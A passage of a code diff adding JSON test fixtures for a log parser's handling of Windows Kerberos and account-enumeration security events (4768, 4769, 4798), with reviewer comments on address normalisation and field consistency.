l\u2019audit\"],\"opcode\":\"Informations\",\"event_data\":{\"TicketEncryptionType\":\"0x12\",\"TicketOptions\":\"0x40810010\",\"IpPort\":\"51261\",\"TargetDomainName\":\"DOMAIN\",\"TargetUserName\":\"account\",\"TargetSid\":\"S-1-2-3\",\"PreAuthType\":\"2\",\"Status\":\"0x0\",\"ServiceSid\":\"S-1-2-3-4-5\",\"IpAddress\":\"::ffff:1.2.3.4\",\"ServiceName\":\"service\"},\"process\":{\"thread\":{\"id\":3228},\"pid\":560},\"event_id\":\"4768\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":2476587536},\"@version\":\"1\"}" 
+ }, + "expected": { + "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Un ticket d\u2019authentification Kerberos (TGT) a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount\\n\\tNom du domaine Kerberos fourni :\\tDOMAIN\\n\\tID de l\u2019utilisateur :\\t\\t\\tS-1-2-3\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tservice\\n\\tID du service :\\t\\tS-1-2-3-4-5\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t51261\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810010\\n\\tCode de r\u00e9sultat :\\t\\t0x0\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tType de pr\u00e9-authentification :\\t2\\n\\nInformations sur le certificat :\\n\\tNom de l\u2019\u00e9metteur du certificat :\\t\\t\\n\\tNum\u00e9ro de s\u00e9rie du certificat :\\t\\n\\t Empreinte num\u00e9rique du certificat :\\t\\t\\n\\nLes informations sur le certificat sont fournies uniquement si un certificat a \u00e9t\u00e9 utilis\u00e9 pour la pr\u00e9-authentification.\\n\\nLes types de pr\u00e9-authentification, les options de ticket, les types de chiffrement et les codes de r\u00e9sultats sont d\u00e9finis dans la RFC 4120.\",\"code\":\"4768\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:17:12.392Z\",\"action\":\"Service d\u2019authentification Kerberos\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:17:10.124Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Un ticket d\u2019authentification Kerberos (TGT) a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount\\n\\tNom du domaine Kerberos fourni :\\tDOMAIN\\n\\tID de l\u2019utilisateur :\\t\\t\\tS-1-2-3\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tservice\\n\\tID du service 
:\\t\\tS-1-2-3-4-5\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t51261\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810010\\n\\tCode de r\u00e9sultat :\\t\\t0x0\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tType de pr\u00e9-authentification :\\t2\\n\\nInformations sur le certificat :\\n\\tNom de l\u2019\u00e9metteur du certificat :\\t\\t\\n\\tNum\u00e9ro de s\u00e9rie du certificat :\\t\\n\\t Empreinte num\u00e9rique du certificat :\\t\\t\\n\\nLes informations sur le certificat sont fournies uniquement si un certificat a \u00e9t\u00e9 utilis\u00e9 pour la pr\u00e9-authentification.\\n\\nLes types de pr\u00e9-authentification, les options de ticket, les types de chiffrement et les codes de r\u00e9sultats sont d\u00e9finis dans la RFC 4120.\",\"host\":{\"name\":\"HOSTNAME.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"id\":\"aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"task\":\"Service d\u2019authentification Kerberos\",\"computer_name\":\"HOSTNAME.domain.priv\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"opcode\":\"Informations\",\"event_data\":{\"TicketEncryptionType\":\"0x12\",\"TicketOptions\":\"0x40810010\",\"IpPort\":\"51261\",\"TargetDomainName\":\"DOMAIN\",\"TargetUserName\":\"account\",\"TargetSid\":\"S-1-2-3\",\"PreAuthType\":\"2\",\"Status\":\"0x0\",\"ServiceSid\":\"S-1-2-3-4-5\",\"IpAddress\":\"::ffff:1.2.3.4\",\"ServiceName\":\"service\"},\"process\":{\"thread\":{\"id\":3228},\"pid\":560},\"event_id\":\"4768\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":2476587536},\"@version\":\"1\"}", + "event": { + "action": "Service d\u2019authentification Kerberos", + "code": "4768", + "kind": "event", + "module": 
"security", + "original": "Un ticket d\u2019authentification Kerberos (TGT) a \u00e9t\u00e9 demand\u00e9.\n\nInformations sur le compte :\n\tNom du compte :\t\taccount\n\tNom du domaine Kerberos fourni :\tDOMAIN\n\tID de l\u2019utilisateur :\t\t\tS-1-2-3\n\nInformations sur le service :\n\tNom du service :\t\tservice\n\tID du service :\t\tS-1-2-3-4-5\n\nInformations sur le r\u00e9seau :\n\tAdresse du client :\t\t::ffff:1.2.3.4\n\tPort client :\t\t51261\n\nInformations suppl\u00e9mentaires :\n\tOptions du ticket :\t\t0x40810010\n\tCode de r\u00e9sultat :\t\t0x0\n\tType de chiffrement du ticket :\t0x12\n\tType de pr\u00e9-authentification :\t2\n\nInformations sur le certificat :\n\tNom de l\u2019\u00e9metteur du certificat :\t\t\n\tNum\u00e9ro de s\u00e9rie du certificat :\t\n\t Empreinte num\u00e9rique du certificat :\t\t\n\nLes informations sur le certificat sont fournies uniquement si un certificat a \u00e9t\u00e9 utilis\u00e9 pour la pr\u00e9-authentification.\n\nLes types de pr\u00e9-authentification, les options de ticket, les types de chiffrement et les codes de r\u00e9sultats sont d\u00e9finis dans la RFC 4120.", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing" + }, + "@timestamp": "2024-11-12T09:17:10.124000Z", + "action": { + "id": 4768, + "outcome": "success", + "properties": { + "IpAddress": "::ffff:1.2.3.4", + "IpPort": "51261", + "PreAuthType": "2", + "ServiceName": "service", + "ServiceSid": "S-1-2-3-4-5", + "Status": "0x0", + "TargetDomainName": "DOMAIN", + "TargetSid": "S-1-2-3", + "TargetUserName": "account", + "TicketEncryptionType": "0x12", + "TicketOptions": "0x40810010" + } + }, + "agent": { + "ephemeral_id": "11111111-2222-3333-4444-555555555555", + "id": "aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee", + "name": "AGENT", + "type": "winlogbeat", + "version": "8.11.1" + }, + "host": { + "name": "HOSTNAME.domain.priv" + }, + "log": { + "level": "information" + }, + "related": { + "ip": [ + "::ffff:102:304" + ], + "user": [ + 
"account"
+ ]
+ },
+ "service": {
+ "name": "service"
+ },
+ "source": {
+ "address": "::ffff:102:304",
+ "ip": "::ffff:102:304",
+ "port": 51261
+ },
+ "user": {
+ "domain": "DOMAIN",
+ "id": "S-1-2-3",
+ "name": "account",
+ "target": {
+ "domain": "DOMAIN",
+ "name": "account"
+ }
+ },
+ "winlog": {
+ "api": "wineventlog",
+ "channel": "Security",
+ "computer_name": "HOSTNAME.domain.priv",
+ "event_data": {
+ "StatusDescription": "KDC_ERR_NONE"
+ },
+ "event_id": "4768",
+ "keywords": [
+ "Succ\u00e8s de l\u2019audit"
+ ],
+ "opcode": "Informations",
+ "process": {
+ "pid": 560,
+ "thread": {
+ "id": 3228
+ }
+ },
+ "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}",
+ "provider_name": "Microsoft-Windows-Security-Auditing",
+ "record_id": "2476587536",
+ "task": "Service d\u2019authentification Kerberos"
+ }
+ }
+}
\ No newline at end of file
diff --git a/Beats/winlogbeat/tests/security_event_4769.json b/Beats/winlogbeat/tests/security_event_4769.json
new file mode 100644
index 000000000..7b1f0f39d
--- /dev/null
+++ b/Beats/winlogbeat/tests/security_event_4769.json
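Review bot: The expected block pins `source.ip`, `source.address` and `related.ip` to `::ffff:102:304`, which is the input `IpAddress` value `::ffff:1.2.3.4` rewritten into hex groups rather than the underlying IPv4 address, so any rule or IoC list keyed on `1.2.3.4` will not match this TGT request. Windows KDCs report IPv4 clients in this IPv4-mapped form routinely, so I would expect the fixture to assert `"ip": "1.2.3.4"` and adjust the address handling in the parser (outside this hunk) to unmap `::ffff:` addresses before emitting them. Separately, `user.target.name` here just repeats `user.name` (`account`), so the `target` sub-object carries no extra information for 4768; if that is a generic mapping it deserves a comment in the parser rather than a silent duplicate in the fixture.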
@@ -0,0 +1,101 @@ +{ + "input": { + "sekoiaio": { + "intake": { + "dialect": "Elastic Winlogbeat", + "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" + } + }, + "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Un ticket de service Kerberos a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount@DOMAIN.PRIV\\n\\tDomaine du compte :\\t\\tDOMAIN.PRIV\\n\\tGUID d\u2019ouverture de session :\\t\\t{12345678-ABCD-EF90-1234-123456ABCDEF}\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tSERVICE$\\n\\tID du service :\\t\\tS-1-2-3\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t50754\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810000\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tCode d\u2019\u00e9chec :\\t\\t0x0\\n\\tServices en transit :\\t-\\n\\nC\u2019et \u00e9v\u00e9nement est g\u00e9n\u00e9r\u00e9 \u00e0 chaque fois qu\u2019un acc\u00e8s est demand\u00e9 \u00e0 une ressource comme un ordinateur ou un service Windows. Le nom du service indique la ressource \u00e0 laquelle l\u2019acc\u00e8s \u00e0 \u00e9t\u00e9 demand\u00e9.\\n\\nCet \u00e9v\u00e9nement peut \u00eatre associ\u00e9 \u00e0 des \u00e9v\u00e9nements de connexion Windows en comparant les champs GUID d\u2019ouverture de session de chaque \u00e9v\u00e9nement. 
L\u2019\u00e9v\u00e9nement de connexion se produit sur l\u2019ordinateur sur lequel l\u2019acc\u00e8s s\u2019est effectu\u00e9, qui souvent n\u2019est pas le m\u00eame ordinateur que le contr\u00f4leur de domaine qui a \u00e9mis le ticket de service.\\n\\nLes options de ticket, les types de chiffrement et les codes d\u2019\u00e9chec sont d\u00e9finis dans la RFC 4120.\",\"code\":\"4769\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:17:05.023Z\",\"action\":\"Op\u00e9rations de ticket du service Kerberos\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:17:02.856Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Un ticket de service Kerberos a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount@DOMAIN.PRIV\\n\\tDomaine du compte :\\t\\tDOMAIN.PRIV\\n\\tGUID d\u2019ouverture de session :\\t\\t{12345678-ABCD-EF90-1234-123456ABCDEF}\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tSERVICE$\\n\\tID du service :\\t\\tS-1-2-3\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t50754\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810000\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tCode d\u2019\u00e9chec :\\t\\t0x0\\n\\tServices en transit :\\t-\\n\\nC\u2019et \u00e9v\u00e9nement est g\u00e9n\u00e9r\u00e9 \u00e0 chaque fois qu\u2019un acc\u00e8s est demand\u00e9 \u00e0 une ressource comme un ordinateur ou un service Windows. Le nom du service indique la ressource \u00e0 laquelle l\u2019acc\u00e8s \u00e0 \u00e9t\u00e9 demand\u00e9.\\n\\nCet \u00e9v\u00e9nement peut \u00eatre associ\u00e9 \u00e0 des \u00e9v\u00e9nements de connexion Windows en comparant les champs GUID d\u2019ouverture de session de chaque \u00e9v\u00e9nement. 
L\u2019\u00e9v\u00e9nement de connexion se produit sur l\u2019ordinateur sur lequel l\u2019acc\u00e8s s\u2019est effectu\u00e9, qui souvent n\u2019est pas le m\u00eame ordinateur que le contr\u00f4leur de domaine qui a \u00e9mis le ticket de service.\\n\\nLes options de ticket, les types de chiffrement et les codes d\u2019\u00e9chec sont d\u00e9finis dans la RFC 4120.\",\"host\":{\"name\":\"HOST01.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"id\":\"aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"task\":\"Op\u00e9rations de ticket du service Kerberos\",\"computer_name\":\"HOST01.domain.priv\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"opcode\":\"Informations\",\"event_data\":{\"TicketEncryptionType\":\"0x12\",\"TicketOptions\":\"0x40810000\",\"LogonGuid\":\"{12345678-ABCD-EF90-1234-123456ABCDEF}\",\"IpPort\":\"50754\",\"TargetDomainName\":\"DOMAIN.PRIV\",\"TargetUserName\":\"account@DOMAIN.PRIV\",\"ServiceSid\":\"S-1-2-3\",\"Status\":\"0x0\",\"TransmittedServices\":\"-\",\"IpAddress\":\"::ffff:1.2.3.4\",\"ServiceName\":\"SERVICE$\"},\"process\":{\"thread\":{\"id\":7992},\"pid\":560},\"event_id\":\"4769\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":2476587153},\"@version\":\"1\"}" + }, + "expected": { + "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Un ticket de service Kerberos a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount@DOMAIN.PRIV\\n\\tDomaine du compte :\\t\\tDOMAIN.PRIV\\n\\tGUID d\u2019ouverture de session :\\t\\t{12345678-ABCD-EF90-1234-123456ABCDEF}\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tSERVICE$\\n\\tID du service :\\t\\tS-1-2-3\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du 
client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t50754\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810000\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tCode d\u2019\u00e9chec :\\t\\t0x0\\n\\tServices en transit :\\t-\\n\\nC\u2019et \u00e9v\u00e9nement est g\u00e9n\u00e9r\u00e9 \u00e0 chaque fois qu\u2019un acc\u00e8s est demand\u00e9 \u00e0 une ressource comme un ordinateur ou un service Windows. Le nom du service indique la ressource \u00e0 laquelle l\u2019acc\u00e8s \u00e0 \u00e9t\u00e9 demand\u00e9.\\n\\nCet \u00e9v\u00e9nement peut \u00eatre associ\u00e9 \u00e0 des \u00e9v\u00e9nements de connexion Windows en comparant les champs GUID d\u2019ouverture de session de chaque \u00e9v\u00e9nement. L\u2019\u00e9v\u00e9nement de connexion se produit sur l\u2019ordinateur sur lequel l\u2019acc\u00e8s s\u2019est effectu\u00e9, qui souvent n\u2019est pas le m\u00eame ordinateur que le contr\u00f4leur de domaine qui a \u00e9mis le ticket de service.\\n\\nLes options de ticket, les types de chiffrement et les codes d\u2019\u00e9chec sont d\u00e9finis dans la RFC 4120.\",\"code\":\"4769\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:17:05.023Z\",\"action\":\"Op\u00e9rations de ticket du service Kerberos\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:17:02.856Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Un ticket de service Kerberos a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount@DOMAIN.PRIV\\n\\tDomaine du compte :\\t\\tDOMAIN.PRIV\\n\\tGUID d\u2019ouverture de session :\\t\\t{12345678-ABCD-EF90-1234-123456ABCDEF}\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tSERVICE$\\n\\tID du service :\\t\\tS-1-2-3\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t50754\\n\\nInformations suppl\u00e9mentaires 
:\\n\\tOptions du ticket :\\t\\t0x40810000\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tCode d\u2019\u00e9chec :\\t\\t0x0\\n\\tServices en transit :\\t-\\n\\nC\u2019et \u00e9v\u00e9nement est g\u00e9n\u00e9r\u00e9 \u00e0 chaque fois qu\u2019un acc\u00e8s est demand\u00e9 \u00e0 une ressource comme un ordinateur ou un service Windows. Le nom du service indique la ressource \u00e0 laquelle l\u2019acc\u00e8s \u00e0 \u00e9t\u00e9 demand\u00e9.\\n\\nCet \u00e9v\u00e9nement peut \u00eatre associ\u00e9 \u00e0 des \u00e9v\u00e9nements de connexion Windows en comparant les champs GUID d\u2019ouverture de session de chaque \u00e9v\u00e9nement. L\u2019\u00e9v\u00e9nement de connexion se produit sur l\u2019ordinateur sur lequel l\u2019acc\u00e8s s\u2019est effectu\u00e9, qui souvent n\u2019est pas le m\u00eame ordinateur que le contr\u00f4leur de domaine qui a \u00e9mis le ticket de service.\\n\\nLes options de ticket, les types de chiffrement et les codes d\u2019\u00e9chec sont d\u00e9finis dans la RFC 4120.\",\"host\":{\"name\":\"HOST01.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"id\":\"aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"task\":\"Op\u00e9rations de ticket du service Kerberos\",\"computer_name\":\"HOST01.domain.priv\",\"keywords\":[\"Succ\u00e8s de 
l\u2019audit\"],\"opcode\":\"Informations\",\"event_data\":{\"TicketEncryptionType\":\"0x12\",\"TicketOptions\":\"0x40810000\",\"LogonGuid\":\"{12345678-ABCD-EF90-1234-123456ABCDEF}\",\"IpPort\":\"50754\",\"TargetDomainName\":\"DOMAIN.PRIV\",\"TargetUserName\":\"account@DOMAIN.PRIV\",\"ServiceSid\":\"S-1-2-3\",\"Status\":\"0x0\",\"TransmittedServices\":\"-\",\"IpAddress\":\"::ffff:1.2.3.4\",\"ServiceName\":\"SERVICE$\"},\"process\":{\"thread\":{\"id\":7992},\"pid\":560},\"event_id\":\"4769\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":2476587153},\"@version\":\"1\"}", + "event": { + "action": "Op\u00e9rations de ticket du service Kerberos", + "code": "4769", + "kind": "event", + "module": "security", + "original": "Un ticket de service Kerberos a \u00e9t\u00e9 demand\u00e9.\n\nInformations sur le compte :\n\tNom du compte :\t\taccount@DOMAIN.PRIV\n\tDomaine du compte :\t\tDOMAIN.PRIV\n\tGUID d\u2019ouverture de session :\t\t{12345678-ABCD-EF90-1234-123456ABCDEF}\n\nInformations sur le service :\n\tNom du service :\t\tSERVICE$\n\tID du service :\t\tS-1-2-3\n\nInformations sur le r\u00e9seau :\n\tAdresse du client :\t\t::ffff:1.2.3.4\n\tPort client :\t\t50754\n\nInformations suppl\u00e9mentaires :\n\tOptions du ticket :\t\t0x40810000\n\tType de chiffrement du ticket :\t0x12\n\tCode d\u2019\u00e9chec :\t\t0x0\n\tServices en transit :\t-\n\nC\u2019et \u00e9v\u00e9nement est g\u00e9n\u00e9r\u00e9 \u00e0 chaque fois qu\u2019un acc\u00e8s est demand\u00e9 \u00e0 une ressource comme un ordinateur ou un service Windows. Le nom du service indique la ressource \u00e0 laquelle l\u2019acc\u00e8s \u00e0 \u00e9t\u00e9 demand\u00e9.\n\nCet \u00e9v\u00e9nement peut \u00eatre associ\u00e9 \u00e0 des \u00e9v\u00e9nements de connexion Windows en comparant les champs GUID d\u2019ouverture de session de chaque \u00e9v\u00e9nement. 
L\u2019\u00e9v\u00e9nement de connexion se produit sur l\u2019ordinateur sur lequel l\u2019acc\u00e8s s\u2019est effectu\u00e9, qui souvent n\u2019est pas le m\u00eame ordinateur que le contr\u00f4leur de domaine qui a \u00e9mis le ticket de service.\n\nLes options de ticket, les types de chiffrement et les codes d\u2019\u00e9chec sont d\u00e9finis dans la RFC 4120.", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing" + }, + "@timestamp": "2024-11-12T09:17:02.856000Z", + "action": { + "id": 4769, + "outcome": "success", + "properties": { + "IpAddress": "::ffff:1.2.3.4", + "IpPort": "50754", + "LogonGuid": "{12345678-ABCD-EF90-1234-123456ABCDEF}", + "ServiceName": "SERVICE$", + "ServiceSid": "S-1-2-3", + "Status": "0x0", + "TargetDomainName": "DOMAIN.PRIV", + "TargetUserName": "account@DOMAIN.PRIV", + "TicketEncryptionType": "0x12", + "TicketOptions": "0x40810000", + "TransmittedServices": "-" + } + }, + "agent": { + "ephemeral_id": "11111111-2222-3333-4444-555555555555", + "id": "aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee", + "name": "AGENT", + "type": "winlogbeat", + "version": "8.11.1" + }, + "host": { + "name": "HOST01.domain.priv" + }, + "log": { + "level": "information" + }, + "related": { + "ip": [ + "::ffff:102:304" + ], + "user": [ + "account" + ] + }, + "service": { + "name": "SERVICE$" + }, + "source": { + "address": "::ffff:102:304", + "ip": "::ffff:102:304", + "port": 50754 + }, + "user": { + "domain": "DOMAIN.PRIV", + "name": "account", + "target": { + "domain": "DOMAIN.PRIV", + "name": "account@DOMAIN.PRIV" + } + }, + "winlog": { + "api": "wineventlog", + "channel": "Security", + "computer_name": "HOST01.domain.priv", + "event_data": { + "StatusDescription": "KDC_ERR_NONE" + }, + "event_id": "4769", + "keywords": [ + "Succ\u00e8s de l\u2019audit" + ], + "opcode": "Informations", + "process": { + "pid": 560, + "thread": { + "id": 7992 + } + }, + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "provider_name": 
"Microsoft-Windows-Security-Auditing",
+ "record_id": "2476587153",
+ "task": "Op\u00e9rations de ticket du service Kerberos"
+ }
+ }
+}
\ No newline at end of file
diff --git a/Beats/winlogbeat/tests/security_event_4798.json b/Beats/winlogbeat/tests/security_event_4798.json
new file mode 100644
index 000000000..b69049f3d
--- /dev/null
+++ b/Beats/winlogbeat/tests/security_event_4798.json
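Review bot: In the expected output `user.name` is reduced to `account` while `user.target.name` keeps the UPN form `account@DOMAIN.PRIV`, so the same principal is spelled two ways in one event and a pivot on `user.target.name` will not line up with `related.user` (`account`); the fixture should pin one consistent form, e.g. `"name": "account"` in `user.target` too, or add the UPN to `related.user`. Also, `Status` is decoded into `winlog.event_data.StatusDescription` (`KDC_ERR_NONE`) but `TicketEncryptionType` (`0x12`) is left raw, and the encryption type is the field weak-cipher service-ticket (Kerberoasting) detections key on; if the parser can decode it, this fixture is the place to assert it. Both points are about behaviour in `ingest/parser.yml`, which is outside this hunk.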
@@ -0,0 +1,114 @@ +{ + "input": { + "sekoiaio": { + "intake": { + "dialect": "Elastic Winlogbeat", + "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" + } + }, + "message": "{\"@timestamp\":\"2024-11-12T08:25:34.741Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4798\",\"created\":\"2024-11-12T08:25:35.614Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"A user's local group membership was enumerated.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACC0123$\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3E7\\n\\nUser:\\n\\tSecurity ID:\\t\\tS-3-4-5\\n\\tAccount Name:\\t\\tGuest\\n\\tAccount Domain:\\t\\tACC0123\\n\\nProcess Information:\\n\\tProcess ID:\\t\\t0x123\\n\\tProcess Name:\\t\\tC:\\\\Program Files\\\\program.exe\"},\"message\":\"A user's local group membership was enumerated.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACC0123$\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3E7\\n\\nUser:\\n\\tSecurity ID:\\t\\tS-3-4-5\\n\\tAccount Name:\\t\\tGuest\\n\\tAccount Domain:\\t\\tACC0123\\n\\nProcess Information:\\n\\tProcess ID:\\t\\t0x123\\n\\tProcess Name:\\t\\tC:\\\\Program Files\\\\program.exe\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"activity_id\":\"{11111111-2222-3333-4444-555555555555}\",\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"channel\":\"Security\",\"task\":\"User Account Management\",\"process\":{\"pid\":668,\"thread\":{\"id\":8860}},\"event_data\":{\"TargetSid\":\"S-3-4-5\",\"TargetUserName\":\"Guest\",\"SubjectDomainName\":\"DOMAIN\",\"CallerProcessName\":\"C:\\\\Program 
Files\\\\program.exe\",\"SubjectUserName\":\"ACC0123$\",\"TargetDomainName\":\"ACC0123\",\"SubjectLogonId\":\"0x3e7\",\"SubjectUserSid\":\"S-1-2-3\",\"CallerProcessId\":\"0x123\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"ACC0123.johndoe.com\",\"record_id\":1524672,\"event_id\":\"4798\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"ACC0123\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"ephemeral_id\":\"12345678-90ab-cdef-1234-123456abcdef\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"hostname\",\"architecture\":\"x86_64\",\"id\":\"12345678-90ef-abcd-1234-abcdef123456\",\"name\":\"hostname\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.20348.169 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2022 Standard\",\"build\":\"20348.169\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}" + }, + "expected": { + "message": "{\"@timestamp\":\"2024-11-12T08:25:34.741Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4798\",\"created\":\"2024-11-12T08:25:35.614Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"A user's local group membership was enumerated.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACC0123$\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3E7\\n\\nUser:\\n\\tSecurity ID:\\t\\tS-3-4-5\\n\\tAccount Name:\\t\\tGuest\\n\\tAccount Domain:\\t\\tACC0123\\n\\nProcess Information:\\n\\tProcess ID:\\t\\t0x123\\n\\tProcess Name:\\t\\tC:\\\\Program Files\\\\program.exe\"},\"message\":\"A user's local group membership was enumerated.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACC0123$\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon 
